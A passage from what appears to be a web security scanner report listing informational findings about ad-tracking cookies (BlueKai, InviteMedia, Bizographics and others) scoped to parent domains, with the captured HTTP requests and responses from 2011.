Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc47740; bk=hClmGdJCToZVIHOf; bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; bko=KJ0qh1q9TaOIhJKqTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYg7CZB; bkst=KJhkMfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYYsrokuzjqRJJWUzUHan70ORtRLiiGtQCuQHLqqhsuhLfs05lugGgRqF7cwFZHJb7WPrpibKtiU6fBTpvO76OXBLD12KcjgXH0XmnSs/Vu39VNX3RlyKVIWqE1eUNkCkaKS9t4MphF74oNK/S7fGtba8hYxs6JHhvRCQ9oMxr2beAbFk3zH0AViUiyx7VkWmPa/rxO/v3kf/J2mJQImJxbzmnun5fH8sthtHgBmB4q7u8tAgovssJmb6Hra3Xb5t8fp7pgr9ZG6QeB32nQbuqYFRkvBAe6yMcDPgylfH3InkJ4nME9WZZkvoUOZihkdUE38PWwJxNgWZShph7quUKo58rR2vlAxYYYmTy/EsOsBL5OyHD/RqczDxbq4fVIK2ZFFp2PdA3s6B; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YROQ9B3Nuw; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=kLyq54JCToZVIHOf; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5666GHaWDOdedjU01MXSYNOeasOvvD1hZ01qiqqsyAsjMnNIBsAkiHDtDLFRhBHSpLVYR0zgSx3AJAfJxq/QP8p0r2X85drodpMll74Lr0QOFaCijFf/DQ9F05S46o15haUkisyifws8TpceJZ7Hl+EElNT8P99tBYL14sSL//5rHjxCpUM+nHu5IyY/UGBot6Me7+UzvQSPOReSSLz2MFyN/wh7Kfo4K1Lp2+q2oF+sTyZliX+dND2JeU5nIPr7pGwHByvM4QeY4gfNjEFzoDRidobNYNBCIBzh8fP/FAvw2HOJor8b21iz51XpNtM6I/cIF1cqLI1Wy8fDE+m2DYZQf5OhSAISX5A1kFqzVCx3UUT/x8gpts5PfbelFcECKq8nZFwR1p4KjPIMpou6wkmlQGlupTUjbMtTUnW3UnDQdE6FUNDgpwBGVfK4nGhetdzfcfrZ9LwtddBkn22d+PDQ574Tfa8eZ2I/tNtLUA8wfYQZUGTqMFRb22w6r50WzVjDKiA7qKlUNryF/dM04tp042QXi+dcO; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2ny69RhZXGYeSNQt8YzU9BlBdlfLYCLRNP/jxSfSCT/PAvfPeEieMbYR3Er0iir9Qbia/HjhzdQTmnZbrUQaOXoIw8wzI2pN6JwzTimtzUE6WJw5Fp9F/YadXBy69hafujFPGILUyso4NK48eNbTU6R3PkansRYrYhv8DhnA2iTHo1yBVhiPVL1941hoXlNFXI4RVG8krdgEuwZ1x9ZM/rOHa19OBbNlZyra3Ku3yDiSOzJeMHi7vQA7/OAkOx2xv4EYzmMi5VmgUuW+v5pZs6lHqom+lRkbL2wZ3aBBuxJrlV1syt4ZolN7+rFRrGT4ZCclxftWIpnU2Ee+121B8Gsv6BKAVFiomU0JzpOjCGu3V0jRQS4NNqUvLQ8vYLcjF1mI/fGIf/rzpn4PE0JCJ9s1WaJMxC2oIBEi/Y07YMGyxidUjdSfNUzdIKdQFOoVTw; expires=Wed, 02-Nov-2011 22:33:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:40 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.44. http://tags.bluekai.com/site/2753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2753

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2753?id=c1e1301e-3a1f-4ca7-9870-f636b5f10e66 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc47740; bk=hClmGdJCToZVIHOf; bkc=KJh56XXgHaWDOdeFBzIwsSmjhDQBMV/1uzG6aeqsprJ+LqYxjZ1FFbJsAkijZAyoSp2KMzPLnJCZJ7IYCPnYoYyDstnawRdgFUmU7d3KzX228fbQe8Mm9sBnPbR9WJuK6M0orUbnK0eWwV1TEFrOunF9IW4jg1VGf5xbZYZFUJaajtc9kv8O0cjK1IVP2pl9bQiyLaStp0mdeU1dSzT1zK2ooFfvllvIiSp9MPUb52LL5fv4m2pB4H7MFG832E+QoFmP5hFk4KGaLr2a6TBZtbISvSdzT9Ur8c8uP+srJtXLz3zNDfN0w9ODfyDZEh6dSvSXLiUlUuQ9wzKmHfKTvSXzSjnFgDF9fdJne10DPfbx2DRameC0FBlOEU7kKE74jNPQ1a96exMqLD4rELt2XMtbUqwYfPFZ4ofMqZlCo7ZDEqZ4n6BQnw9fcp7KOtqf4dZpP2Tdkh9G7JpdI0fvEKdaqSoUgowmcyoRn32opiRzKIUlvIU97BgAE3S8fqtbI+NsKUISpttSEdAcBGw7lx==; bko=KJ0qh1q9TaOIhJKqTxTF96BJpDa4JQjPmWrVMTcChrGeFAG1AkYV/WmR/9mee4XIU6Rss0ena1p08GVyZOQuGuhZCi3QMoBn5QOkM5AjswSOVxYg7CZB; bkst=KJhkMfNv96WDCSz/YsjMYALCVBQrpmI5sqO/Ms+DYYsrokuzjqRJJWUzUHan70ORtRLiiGtQCuQHLqqhsuhLfs05lugGgRqF7cwFZHJb7WPrpibKtiU6fBTpvO76OXBLD12KcjgXH0XmnSs/Vu39VNX3RlyKVIWqE1eUNkCkaKS9t4MphF74oNK/S7fGtba8hYxs6JHhvRCQ9oMxr2beAbFk3zH0AViUiyx7VkWmPa/rxO/v3kf/J2mJQImJxbzmnun5fH8sthtHgBmB4q7u8tAgovssJmb6Hra3Xb5t8fp7pgr9ZG6QeB32nQbuqYFRkvBAe6yMcDPgylfH3InkJ4nME9WZZkvoUOZihkdUE38PWwJxNgWZShph7quUKo58rR2vlAxYYYmTy/EsOsBL5OyHD/RqczDxbq4fVIK2ZFFp2PdA3s6B; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YROQ9B3Nuw; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 06 May 2011 22:33:23 GMT
Set-Cookie: bklc=4dc47733; expires=Sun, 08-May-2011 22:33:23 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QT5qXdJCToZVIHOf; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XXgHaWDOdeF7HAdhGdsQ+xxhHiua/jiB+CjFmtyLJOZR0IdsMVuh/3SEYkgwbqsRMRVEWqIO9rkJApvxgWCPopprBTf5dZoff7llc4m3bLYo7SO6zPguysG/6XSMCZrtJer38KK2MArAvrFQ9sURyFu7B5mNQ9+gxgMcyVgeacqXPD/zNffiGomQTOa23eK5+Ry8fUlF1evYeY4vBMlL5IsojX1fy8JfhMZXfVd3qIJk1J+8Fn4pEwuRfluyDfoife6EziGlT/ylbI2UDlF3PO/FKz+nhoLFhgZFcSkc0MuwmmjFalwUkrxECgZKrlI9aYbPTi5mcTypc7+e16fkymbMChcBbx8g2NuudFjGPeMXALRyopUw35bcIlqd3cMpEjopZFwDUI4JRUOxBf0x5Amw63lsIbZ4UEqL0h5+uE2wYF5NYMBdVCqBJXF7XJGTnzd57XwCmldbX2IK7XbGo9fwF+l1uEBII/tNtrUAf1cYCZUWTjEWz5II7bUSxMcNbUcA+ntUal7lRUAI504t2042Qdie4ag; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2n9pWRCp1DOcrNQbBxcaywXF5B9Qb+KkSaDrooHbD8zArCcKg5iEMbYR3Er0iir9Qbia/HjhzdQTmnZbr8z0kZYgdlI4WIuxA2piJlpibKViU6fmTpvO76OXBLD12KUEHh6HvviYD1WIrpcGk2cFVAg8UW4Qy1M/QJ+QYLTadIKsSo9s823RphKV0aqp9OUN+MkPVR9tqMphFcF6IFaBUzT++aXTCJev9oTN/xyxxyG4KXOpKrk3zS06VMPuTS7sCamPOJrxOJvvCb1EbjqCyzENh6b3Jaoer5yti7nj/Br+ZEvltKBA1SSAMi571Dg3lINmTzKIfROqESY1vQNKlQ/1ZtQ068uFqOBBJH+efLaNTPn84/kp1aZsCvoU/0H/tdg+tTPAc/xN7qZ3hhhc4Eqro587/4k5hW9QQMr1YWr+dWtmQT/391Bp3v/5JF2fKmFjgf2dH4LBkpuQ==; expires=Wed, 02-Nov-2011 22:33:23 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 07-May-2011 22:33:23 GMT; path=/; domain=.bluekai.com
BK-Server: ddb4
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.45. http://tags.bluekai.com/site/2948  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2948

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2948?phint=idswap_partner=bk HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=9b6b0&phint=ord=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bklc=4dc52bfa; bk=uXtktHA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeFBKwceJojAWvMsWmu/CupXVBkXqqeyAvSMqlsM6SBJnsiJAojIpWNagmhRen0JNQGJE2uaGGBLKvzjIbX5If0DI5fff7F7O46981fy1MY+KVahh1AhyhUgAFlNAkwKh6U0BPUyeCj9VecW+JzgXl83KJ2faxBWsoHswL3VmV/tGbFxJMptkzDmZ6Wnc/jbZh7eUm223TcVOTs8o1aIpfth8e6iIs5xKk+yl0I2idNB8aVr1Nzk+yX/plS/2lR/U6HAqTJsdkBYww2tkFP2J8vC4H7lFvQlFSfRSfUgF/O2pE4KYjF82ZgYKZDRz8g2yV98yKat/7MHXBzg8tCKK50xmKHTIibBB5gCtoow2GPSkhIi6YRbfUwvKIkd5Ld5npHvLlNt7wDldKpyA9QEdrgqWKKoBL152WIrkttJmN4kcb5kV83AmjI+YtSpT2URuEylhIfghFY2F2V+/dKF2KFAeLIvdAIn1lfTMq7+uF/txmaM1+JyIkIhpfb4o5fW/bFuRIZomt8rLbfYXFprEIlrEd+wtbDXzQ=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkst=KJh5Ae2n9pWRCp1DOcrNQb1QeZ80An2FW7OGgV5PvvVK5kuS/fzDt3cz7EMfYR3Er0iir9QbivvGLTr4yzcaEU9050faEmclwMdKJ0ZCrt7ApFco4SrWc+h2YiVedZYReVgjLTLKUqu//Z/JyXEbgW5i76z2bVLkLHXe90BiQiN9GIY4d7CZ3xOr4SZ1XUkLCVXy9P2qR8PPZ9BZTT2nhf2BgCEPlmnnHqm/ux0QvKBuW1WW1valFPLlgoR7sL+aGNDrsohGHEkxuqA9uuiGVMWI7spXnntTb1CaY6ClmFFH5kLAbluMJN4bwstsBBuxhmlZvah+4124mdqWLUmGDxdYGBU+TYeJ+GJBmDgtyBEEDqxtfO5KauIU0JzpOjCGu3P01AuBw0dzKnbYA/K0+MPjdReFoBlDmXFklir8ixxxH7YOYUVdiqcHzDH9sV86aWmAUtIrccLIXIdoFdRcz81=; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Sat, 07 May 2011 11:25:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sun, 08 May 2011 11:25:06 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=xodlbCA+ZqtVIHOf; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgCsWDOFe7BK10nG66DGCieW7vC1nsjVUhVxTnYtAt27JgN9iJaEPH0+okiLPLnJi1I9XLkJJgnOxqRLD8cbdFmI2iagXbpl7wpeZpD9OXwiiDBJNqYL9YIukUKG9IqQ2fcH479TBgxw4AZKVahXmms185ksTJuc1dfx08TOEG/lBd5ZHYZrrNmEd62hTfUQCDPuF64ZuLqcEjML8YZwwSohxbv9zLzCRY+FzBzfltrQKRbxEsRh7fw4jqCduMTqPtbPUeladfZIqgE0CzJAdIUEAil51LUPTF4H0uFQQSIVD/XdFSvfE4B2odTMN+KPO3I2DyNtF7IROgtZX6ZqqpfnAJbqCCpZrcdze2MDJApds+RSfUE+vID0ZQRz5hNb/6Nt+Ua5a2NYADrFyuQMeUSh2HlAFl+f7+KvksZrrNhtiIplraB7ISfk4je+NJNhoroc+6mt+Sm72vI7kDr3J1Zr4H+ZQdUNbaqFdF4mhyWTE+d2r444E2BNGPDgrcdfTmuFm2r1N8fHp0dojY6rVRTDugRhd24izqW/fmud4WoKt2rFo5OVPd7L2+7AdfOyj5d16=; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5DeNny69RF3WQtBuYMAJhzeHy7Id5QRmNh3oxuGNtPcgCLCESGuxHjl2OzU/UHHxUxx5HacPtXEzTrni8KGknXSSc8Tw7KSIWf3KHK057eb6uK7HTYiVedZYRePS0a6z2mVGHHzxuCG7NVRdWwG2b6+5vRMXsOAqWOar9HraddF1puyPyb6+kM12Mvl0eY4MSs3rLyCyysl2Km4dfjvVG8irIcEVcZ1x9ZM/rOHa19OBbpf+pzgDXAPQrW3N0AKOWvX3OuLGauWJOgHE0DEAdzUqoNKaMChKxf7xmGottueqGjAIr277SesZG/R7qpPsTNFiolEMF34wmG6R2Y/BV+TmeJBLm+rxGtx5EE64HIgO4evoTKUFK0CHQGiZP036QSFhNbKHSOuWwjVNgLFGCl6tf3UKKgd3G8WLAQeYYY60GI6S1MRTM9LoyGb1R/FNtKItXapwdqFTaniJFkx==; expires=Thu, 03-Nov-2011 11:25:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 08-May-2011 11:25:06 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.46. http://track.websiteceo.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.websiteceo.com
Path:   /m/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/?id=411330&amp;pc=0&amp;p=home&amp;gr=home&amp;tr=home&amp;trid=1304730939&amp;ord=&cs=UTF-8&s=1&cpu=&rf=bookmark&frl=0&hr=http%3A//www.lbmctech.com/&je=y&ce=y&sl=&bl=&ul=&nl=en-US&shw=1200*1920&scd=16&tz=-5&pg=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&rndm=0.2219536614138633 HTTP/1.1
Host: track.websiteceo.com
Proxy-Connection: keep-alive
Referer: http://www.lbmctech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:32:23 GMT
Server: Apache/1.3.39 (Unix) mod_perl/1.30
P3P: policyref="/w3c/p3p.xml", CP="policyref="/w3c/p3p.xml", CP="NOI DSP COR CUR OUR STP""
Set-Cookie: hitlens=visitor&vasya-1304731943-7162; domain=websiteceo.com; path=/; expires=Mon, 06-May-2013 01:32:23 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
17.47. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1=eJzjYuZYEMzFzHE0h4uF48QTJiB5sJsRSE56ygQUbowAEudygMRpkILjYAU7djECBf6FA5l734OY042BzDk/QHLvDjADyc4OEDn3B8iIiSpA5ovdzFxcHDv3MQscOrjsHQsXEwcHUGpjMVDqyQWQdSfBut/uBum78B3EPnQERM4Eizf/B5n0jwPIbAIz9/sBmRf3guRe7gORa/czAgDZyTWv

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:18:38 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAXebdj+jgUocrCbEUhOesoEVNIYASTO5QCJ0yDFO3aBpI4/AUn9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBAbRjJ9COQweXge14sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpvAzP1+QObFvSC5tftB+l/uYwIAqJw6nw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Sun, 06-May-2012 01:18:38 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)

17.48. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?pid=394&url=http%3A%2F%2Fwww.scmagazineus.com%2Fsubscribe%2Fsection%2F122%2F&pageUrl=http%3A%2F%2Fwww.scmagazineus.com%2Fsubscribe%2Fsection%2F122%2F&time=1304749860650 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; BizoData=iiFz5fMs2QShjkhZT8LeYctQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KQKFq4fisNXg8aj5XcunNcMDa7Re6IGD4lNgBKuNuTpUhAd6xyMUDLG5lQJdhrgBMSAvGD45Q9a4FEBqbD2j4hAiiCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvzv7isqEZGsyCMaXAZCYEXjdJRFsRyXovJP46iixMTIzLpWr1XIQIIGVTD2hEugu6d5BiitkUr3XlA8XK8qisqrmVaGZFS5a7fwuH7sQ46xipWO7p50vbcvMQEdM8EL3R4f4J5Ufxc35xQDd3qfFvtjSMcZon9yt55w3TOIwQ0TyFv2zEoDD2QOGIoPgD4Dq0eDBT5IhXJA5LH3s1gXpy8bjFCh02EPiiJWd8pSf2DhmMwRPaHcohp8zdUc1WUMZoWWHG9a09m7kipeK2wjn3eQsLh6cdwnjLty94KHGS82BSc6FNV4ie; BizoNetworkPartnerIndex=11

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 07 May 2011 01:50:38 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
